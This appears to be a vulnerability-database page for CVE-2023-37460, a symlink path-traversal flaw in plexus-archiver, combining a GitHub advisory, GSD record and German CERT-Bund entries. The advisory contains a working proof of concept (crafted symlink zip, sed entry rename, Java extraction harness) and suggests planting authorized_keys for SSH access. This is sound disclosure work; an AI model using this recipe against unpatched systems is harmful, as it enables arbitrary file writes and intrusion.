That’s because the way FileUtils.resolveFile() works:
```java
// Excerpt as quoted by the advisory; "..." marks code the advisory left out.
public static File resolveFile( final File baseFile, String filename )
{
    ...
    try
    {
        // NOTE(review): per the advisory, for a symbolic link whose target does not exist
        // getCanonicalFile() yields the absolute path of the link itself, so callers that
        // validate the returned File see a path inside the base directory.
        file = file.getCanonicalFile();
    }
    catch ( final IOException ioe )
    {
        // nop
        // NOTE(review): a failed canonicalization is swallowed here, so the
        // non-canonical file is what gets returned below.
    }

    return file;
}
```
File.getCanonicalFile() (tested with the most recent version of openjdk (22.2) on Unix) will eventually call [JDK_Canonicalize()](https://github.com/openjdk/jdk/blob/jdk-22%2B2/src/java.base/unix/native/libjava/canonicalize_md.c#LL48C1-L68C69):
```cpp
JNIEXPORT int
JDK_Canonicalize(const char *orig, char *out, int len)
{
if (len < PATH_MAX) {
errno = EINVAL;
return -1;
}
if (strlen(orig) > PATH_MAX) {
errno = ENAMETOOLONG;
return -1;
}
/* First try realpath() on the entire path */
if (realpath(orig, out)) {
/* That worked, so return it */
collapse(out);
return 0;
} else {
/* Something's bogus in the original path, so remove names from the end
until either some subpath works or we run out of names */
...
```
realpath() returns the destination path for a symlink if that destination exists. If it does not, realpath() returns NULL and the else clause is reached, which eventually returns the path of the symlink itself.
So if the entry already exists as a symbolic link to a non-existent file, file.getCanonicalFile() returns the absolute path of the symbolic link, and this check passes:
```java
Path canonicalDirPath = dir.getCanonicalFile().toPath();
Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();
if ( !canonicalDestPath.startsWith( canonicalDirPath ) ) { throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" ); }
```
Later, the content of the entry will be written to the symbolic link’s destination, which creates the destination file and fills it with the entry’s content.
Arbitrary file creation can lead to remote code execution. For example, if there is an SSH server on the victim’s machine and ~/.ssh/authorized_keys does not exist - creating this file and filling it with an attacker's public key will allow the attacker to connect to the SSH server without knowing the victim’s password.
### PoC
We created a zip as follows:
```bash
$ ln -s /tmp/target entry1
$ echo -ne “content” > entry2
$ zip --symlinks archive.zip entry1 entry2
```
The following command will change the name of entry2 to entry1:
```bash
$ sed -i 's/entry2/entry1/' archive.zip
```
We put archive.zip in /tmp and create a dir for the extracted files:
```bash
$ cp archive.zip /tmp
$ mkdir /tmp/extracted_files
```
Next, we wrote Java code that opens archive.zip:
```java
package com.example;
import java.io.File;
import org.codehaus.plexus.archiver.zip.ZipUnArchiver;
/**
 * Reproduction harness from the advisory: unpacks /tmp/archive.zip into
 * /tmp/extracted_files using ZipUnArchiver.
 *
 * The advisory reports that on plexus-archiver versions before 4.8.0 this run
 * leaves the entry's content in /tmp/target, i.e. outside the destination
 * directory. After upgrading, the same run can serve as a regression check:
 * /tmp/target should not be created.
 * NOTE(review): confirm the exact patched behaviour against the 4.8.0 fix commit.
 */
public class App
{
    public static void main( String[] args )
    {
        // Archive under test and extraction root, as used in the advisory's walkthrough.
        final File archive = new File("/tmp/archive.zip");
        final File destination = new File("/tmp/extracted_files");

        ZipUnArchiver extractor = new ZipUnArchiver(archive);
        extractor.setDestDirectory(destination);

        // The destination-directory containment check runs inside extract().
        extractor.extract();
    }
}
```
After running this Java code, we can see that /tmp/target contains the string “content”:
```
$ cat /tmp/target
content
```
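Note that although we used a duplicated entry name within a single archive here, the same result can also be reached with two different archives extracted into the same destination directory - one that contains a symlink and another that contains a regular file with the same entry name as the symlink. Because the single-archive variant creates the symlink itself, extracting into an empty directory does not by itself prevent the issue; the patch is in version 4.8.0.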
{ "affected": [ { "package": { "ecosystem": "Maven", "name": "org.codehaus.plexus:plexus-archiver" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "4.8.0" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2023-37460" ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2023-07-25T17:20:43Z", "nvd_published_at": "2023-07-25T20:15:13Z", "severity": "HIGH" }, "details": "### Summary\n\nUsing AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution.\n\n### Description\nWhen extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the resolveFile() function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later Files.newOutputStream(), that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target.\n\n### Impact\nWhoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution.\n\n### Technical Details\n\nIn [AbstractUnArchiver.java](https://github.com/codehaus-plexus/plexus-archiver/blob/plexus-archiver-4.7.1/src/main/java/org/codehaus/plexus/archiver/AbstractUnArchiver.java#L342):\n```java\nprotected void extractFile( final File srcF, final File dir, final InputStream compressedInputStream, String entryName, final Date entryDate, final boolean isDirectory, final Integer mode, String symlinkDestination, final FileMapper[] fileMappers)\n throws IOException, ArchiverException\n {\n ...\n // Hmm. Symlinks re-evaluate back to the original file here. 
Unsure if this is a good thing...\n final File targetFileName = FileUtils.resolveFile( dir, entryName );\n\n\n // Make sure that the resolved path of the extracted file doesn\u0027t escape the destination directory\n // getCanonicalFile().toPath() is used instead of getCanonicalPath() (returns String),\n // because \"/opt/directory\".startsWith(\"/opt/dir\") would return false negative.\n Path canonicalDirPath = dir.getCanonicalFile().toPath();\n Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();\n\n\n if ( !canonicalDestPath.startsWith( canonicalDirPath ) )\n {\n throw new ArchiverException( \"Entry is outside of the target directory (\" + entryName + \")\" );\n }\n\n\n try\n {\n ...\n if ( !StringUtils.isEmpty( symlinkDestination ) )\n {\n SymlinkUtils.createSymbolicLink( targetFileName, new File( symlinkDestination ) );\n }\n else if ( isDirectory )\n {\n targetFileName.mkdirs();\n }\n else\n {\n try ( OutputStream out = Files.newOutputStream( targetFileName.toPath() ) )\n {\n IOUtil.copy( compressedInputStream, out );\n }\n }\n\n\n targetFileName.setLastModified( entryDate.getTime() );\n\n\n if ( !isIgnorePermissions() \u0026\u0026 mode != null \u0026\u0026 !isDirectory )\n {\n ArchiveEntryUtils.chmod( targetFileName, mode );\n }\n }\n catch ( final FileNotFoundException ex )\n {\n getLogger().warn( \"Unable to expand to file \" + targetFileName.getPath() );\n }\n }\n```\nWhen given an entry that already exists in dir as a symbolic link whose target does not exist - the symbolic link\u2019s target will be created and the content of the archive\u2019s entry will be written to it.\n\nThat\u2019s because the way FileUtils.resolveFile() works:\n```java\npublic static File resolveFile( final File baseFile, String filename )\n {\n ...\n try\n {\n file = file.getCanonicalFile();\n }\n catch ( final IOException ioe )\n {\n // nop\n }\n\n\n return file;\n }\n```\nFile.getCanonicalFile() (tested with the most recent version of openjdk (22.2) on Unix) 
will eventually call [JDK_Canonicalize()](https://github.com/openjdk/jdk/blob/jdk-22%2B2/src/java.base/unix/native/libjava/canonicalize_md.c#LL48C1-L68C69):\n```cpp\nJNIEXPORT int\nJDK_Canonicalize(const char *orig, char *out, int len)\n{\n if (len \u003c PATH_MAX) {\n errno = EINVAL;\n return -1;\n }\n\n if (strlen(orig) \u003e PATH_MAX) {\n errno = ENAMETOOLONG;\n return -1;\n }\n\n /* First try realpath() on the entire path */\n if (realpath(orig, out)) {\n /* That worked, so return it */\n collapse(out);\n return 0;\n } else {\n /* Something\u0027s bogus in the original path, so remove names from the end\n until either some subpath works or we run out of names */\n ...\n```\nrealpath() returns the destination path for a symlink, if this destination exists. But if it doesn\u2019t - \nit will return NULL and we will reach the else\u2019s clause, which will eventually return the path of the symlink itself.\nSo in case the entry is already exists as a symbolic link to a non-existing file - file.getCanonicalFile() will return the absolute path of the symbolic link and this check will pass:\n```java\nPath canonicalDirPath = dir.getCanonicalFile().toPath();\nPath canonicalDestPath = targetFileName.getCanonicalFile().toPath();\n\n\nif ( !canonicalDestPath.startsWith( canonicalDirPath ) )\n{\n throw new ArchiverException( \"Entry is outside of the target directory (\" + entryName + \")\" );\n}\n```\nLater, the content of the entry will be written to the symbolic link\u2019s destination and by doing so will create the destination file and fill it with the entry\u2019s content.\n\nArbitrary file creation can lead to remote code execution. 
For example, if there is an SSH server on the victim\u2019s machine and ~/.ssh/authorized_keys does not exist - creating this file and filling it with an attacker\u0027s public key will allow the attacker to connect the SSH server without knowing the victim\u2019s password.\n\n### PoC\nWe created a zip as following:\n```bash\n$ ln -s /tmp/target entry1\n$ echo -ne \u201ccontent\u201d \u003e entry2\n$ zip --symlinks archive.zip entry1 entry2\n```\nThe following command will change the name of entry2 to entry1:\n```bash\n$ sed -i \u0027s/entry2/entry1/\u0027 archive.zip\n```\nWe put archive.zip in /tmp and create a dir for the extracted files:\n```bash\n$ cp archive.zip /tmp\n$ mkdir /tmp/extracted_files\n```\nNext, we wrote a java code that opens archive.zip:\n```java\npackage com.example;\n\nimport java.io.File;\n\nimport org.codehaus.plexus.archiver.zip.ZipUnArchiver;\n\npublic class App \n{\n public static void main( String[] args )\n {\n ZipUnArchiver unArchiver = new ZipUnArchiver(new File(\"/tmp/archive.zip\"));\n unArchiver.setDestDirectory(new File(\"/tmp/extracted_files\"));\n unArchiver.extract(); \n }\n}\n```\nAfter running this java code, we can see that /tmp/target contains the string \u201ccontent\u201d:\n```\n$ cat /tmp/target\ncontent\n```\nNotice that although we used here a duplicated entry name in the same archive, this attack can be performed also by two different archives - one that contains a symlink and another archive that contains a regular file with the same entry name as the symlink.", "id": "GHSA-wh3p-fphp-9h2m", "modified": "2023-08-03T17:59:29Z", "published": "2023-07-25T17:20:43Z", "references": [ { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460" }, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2" }, { "type": 
"PACKAGE", "url": "https://github.com/codehaus-plexus/plexus-archiver" }, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "type": "CVSS_V3" } ], "summary": "Arbitrary File Creation in AbstractUnArchiver" }
gsd-2023-37460
Vulnerability from gsd
{ "GSD": { "alias": "CVE-2023-37460", "id": "GSD-2023-37460" }, "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2023-37460" ], "details": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. 
Version 4.8.0 contains a patch for this issue.", "id": "GSD-2023-37460", "modified": "2023-12-13T01:20:24.249036Z", "schema_version": "1.4.0" } }, "namespaces": { "cve.org": { "CVE_data_meta": { "ASSIGNER": "security-advisories@github.com", "ID": "CVE-2023-37460", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "plexus-archiver", "version": { "version_data": [ { "version_affected": "=", "version_value": "\u003c 4.8.0" } ] } } ] }, "vendor_name": "codehaus-plexus" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue." 
} ] }, "impact": { "cvss": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "cweId": "CWE-22", "lang": "eng", "value": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" } ] }, { "description": [ { "cweId": "CWE-61", "lang": "eng", "value": "CWE-61: UNIX Symbolic Link (Symlink) Following" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m", "refsource": "MISC", "url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m" }, { "name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2", "refsource": "MISC", "url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2" }, { "name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0", "refsource": "MISC", "url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0" } ] }, "source": { "advisory": "GHSA-wh3p-fphp-9h2m", "discovery": "UNKNOWN" } }, "gitlab.com": { "advisories": [ { "affected_range": "(,4.8.0)", "affected_versions": "All versions before 4.8.0", "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwe_ids": [ "CWE-1035", "CWE-22", "CWE-937" ], "date": "2023-08-03", "description": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. 
Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.", "fixed_versions": [ "4.8.0" ], "identifier": "CVE-2023-37460", "identifiers": [ "CVE-2023-37460", "GHSA-wh3p-fphp-9h2m" ], "not_impacted": "All versions starting from 4.8.0", "package_slug": "maven/org.codehaus.plexus/plexus-archiver", "pubdate": "2023-07-25", "solution": "Upgrade to version 4.8.0 or above.", "title": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)", "urls": [ "https://nvd.nist.gov/vuln/detail/CVE-2023-37460", "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0", "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m", "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2" ], "uuid": "ded6bbbc-3ead-4282-bad5-7314a91bf82c" } ] }, "nvd.nist.gov": { "configurations": { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.8.0", "vulnerable": true } ], "operator": "OR" } ] }, "cve": { "CVE_data_meta": { "ASSIGNER": "security-advisories@github.com", 
"ID": "CVE-2023-37460" }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "en", "value": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue." 
} ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "en", "value": "CWE-22" }, { "lang": "en", "value": "CWE-61" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0", "refsource": "MISC", "tags": [ "Release Notes" ], "url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0" }, { "name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m", "refsource": "MISC", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m" }, { "name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2", "refsource": "MISC", "tags": [ "Patch" ], "url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2" } ] } }, "impact": { "baseMetricV3": { "cvssV3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9 } }, "lastModifiedDate": "2023-08-03T13:52Z", "publishedDate": "2023-07-25T20:15Z" } } }
wid-sec-w-2023-2368
Vulnerability from csaf_certbund
Notes
{ "document": { "aggregate_severity": { "text": "hoch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "IBM Operational Decision Manager ist Software f\u00fcr die Integration von Gesch\u00e4ftsereignissen und Gesch\u00e4ftsregeln, um Entscheidungen \u00fcber verschiedene Prozesse und Anwendungen hinweg zu automatisieren.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein entfernter authentifizierter Angreifer kann mehrere Schwachstellen in IBM Operational Decision Manager ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, beliebigen Code auszuf\u00fchren, einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen.", "title": "Angriff" }, { "category": "general", "text": "- Linux", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2023-2368 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-2368.json" }, { "category": "self", "summary": "WID-SEC-2023-2368 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-2368" }, { "category": "external", "summary": "IBM Security Bulletin - 7032928 vom 2023-09-14", "url": "https://www.ibm.com/support/pages/node/7032928" }, { 
"category": "external", "summary": "Red Hat Security Advisory RHSA-2023:6138 vom 2023-10-26", "url": "https://access.redhat.com/errata/RHSA-2023:6138" }, { "category": "external", "summary": "IBM Security Bulletin 7105614 vom 2024-01-08", "url": "https://www.ibm.com/support/pages/node/7105614" } ], "source_lang": "en-US", "title": "IBM Operational Decision Manager: Mehrere Schwachstellen", "tracking": { "current_release_date": "2024-01-07T23:00:00.000+00:00", "generator": { "date": "2024-02-15T17:44:18.727+00:00", "engine": { "name": "BSI-WID", "version": "1.3.0" } }, "id": "WID-SEC-W-2023-2368", "initial_release_date": "2023-09-14T22:00:00.000+00:00", "revision_history": [ { "date": "2023-09-14T22:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" }, { "date": "2023-10-26T22:00:00.000+00:00", "number": "2", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2024-01-07T23:00:00.000+00:00", "number": "3", "summary": "Neue Updates von IBM aufgenommen" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "IBM Operational Decision Manager \u003c 8.10.5.1", "product": { "name": "IBM Operational Decision Manager \u003c 8.10.5.1", "product_id": "T029909", "product_identification_helper": { "cpe": "cpe:/a:ibm:operational_decision_manager:8.10.5.1" } } }, { "category": "product_name", "name": "IBM Operational Decision Manager \u003c 8.11.0.1", "product": { "name": "IBM Operational Decision Manager \u003c 8.11.0.1", "product_id": "T029910", "product_identification_helper": { "cpe": "cpe:/a:ibm:operational_decision_manager:8.11.0.1" } } }, { "category": "product_name", "name": "IBM Operational Decision Manager \u003c 8.11.1", "product": { "name": "IBM Operational Decision Manager \u003c 8.11.1", "product_id": "T029911", "product_identification_helper": { "cpe": "cpe:/a:ibm:operational_decision_manager:8.11.1" } } }, { "category": "product_name", "name": "IBM 
Operational Decision Manager \u003c 8.12.0", "product": { "name": "IBM Operational Decision Manager \u003c 8.12.0", "product_id": "T029912", "product_identification_helper": { "cpe": "cpe:/a:ibm:operational_decision_manager:8.12.0" } } }, { "category": "product_name", "name": "IBM Operational Decision Manager 8.10.5.1 \u003c IF049", "product": { "name": "IBM Operational Decision Manager 8.10.5.1 \u003c IF049", "product_id": "T031894", "product_identification_helper": { "cpe": "cpe:/a:ibm:operational_decision_manager:8.10.5.1__if049" } } } ], "category": "product_name", "name": "Operational Decision Manager" } ], "category": "vendor", "name": "IBM" }, { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux", "product": { "name": "Red Hat Enterprise Linux", "product_id": "67646", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:-" } } } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2022-2047", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der HttpURI-Klasse der Eclipse Jetty-Komponente. Durch das Senden einer speziell gestalteten Anfrage kann ein Angreifer diese Schwachstelle ausnutzen, um die Sicherheitsma\u00dfnahmen zu umgehen." } ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2022-2047" }, { "cve": "CVE-2014-0107", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Apache Xalan-Java-Komponente aufgrund einer unsachgem\u00e4\u00dfen Behandlung von Ausgabeeigenschaften. Ein entfernter Angreifer kann diese Schwachstelle zur Umgehung von Sicherheitsma\u00dfnahmen ausnutzen." 
} ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2014-0107" }, { "cve": "CVE-2022-25881", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht im Node.js http-cache-semantics-Modul aufgrund eines Denial of Service (ReDoS) durch regul\u00e4re Ausdr\u00fccke. Durch das Senden einer speziell gestalteten Regex-Eingabe unter Verwendung von Request-Header-Werten kann ein entfernter Angreifer diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu verursachen." } ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2022-25881" }, { "cve": "CVE-2022-34169", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Apache Xalan Java XSLT Bibliothekskomponente aufgrund eines Integer Truncation Problems bei der Verarbeitung von b\u00f6sartigen XSLT Stylesheets. Ein entfernter Angreifer kann diese Schwachstelle zur Ausf\u00fchrung von beliebigem Code ausnutzen" } ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2022-34169" }, { "cve": "CVE-2022-41946", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Postgresql JDBC-Komponente aufgrund eines nicht eingeschr\u00e4nkten Zugriffs zum Erstellen lesbarer Dateien im TemporaryFolder. Durch das Senden einer speziell gestalteten Anfrage kann ein Angreifer diese Schwachstelle ausnutzen, um vertrauliche Informationen offenzulegen." 
} ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2022-41946" }, { "cve": "CVE-2023-34034", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Komponente VMware Tanzu Spring Security aufgrund einer unsachgem\u00e4\u00dfen Validierung von Benutzereingaben. Mit einer speziell gestalteten Konfiguration kann ein Angreifer diese Schwachstelle ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen." } ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2023-34034" }, { "cve": "CVE-2023-37460", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Komponente Plexus Archiver aufgrund der Verfolgung eines symbolischen Links in der Funktion resolveFile(). Durch Extrahieren einer speziell gestalteten Archivdatei, die einen symbolischen Link enth\u00e4lt, mit AbstractUnArchiver kann ein Angreifer diese Schwachstelle ausnutzen, um beliebigen Code auszuf\u00fchren." } ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2023-37460" } ] }
WID-SEC-W-2023-2368
Vulnerability from csaf_certbund
Notes
{ "document": { "aggregate_severity": { "text": "hoch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "IBM Operational Decision Manager ist Software f\u00fcr die Integration von Gesch\u00e4ftsereignissen und Gesch\u00e4ftsregeln, um Entscheidungen \u00fcber verschiedene Prozesse und Anwendungen hinweg zu automatisieren.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein entfernter authentifizierter Angreifer kann mehrere Schwachstellen in IBM Operational Decision Manager ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, beliebigen Code auszuf\u00fchren, einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen.", "title": "Angriff" }, { "category": "general", "text": "- Linux", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2023-2368 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-2368.json" }, { "category": "self", "summary": "WID-SEC-2023-2368 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-2368" }, { "category": "external", "summary": "IBM Security Bulletin - 7032928 vom 2023-09-14", "url": "https://www.ibm.com/support/pages/node/7032928" }, { 
